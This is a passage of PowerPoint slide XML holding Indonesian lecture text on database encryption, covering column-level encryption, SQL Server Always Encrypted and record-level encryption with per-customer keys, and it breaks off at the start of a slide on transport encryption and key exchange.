              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kolom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> database, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> administrator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bidang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mana yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempersulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bekerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Always Encrypted SQL Server, data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Itu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memasok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> plaintext </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> DBMS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> administrator database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemisahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tugas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> administrator database dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemilik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>catatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, basis data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asuransi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesehatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesehatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpisah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pasangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> baris/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rekaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Tabel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>catatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpisah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privasi</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54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21536619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Enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Transportasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pertukaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transportasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
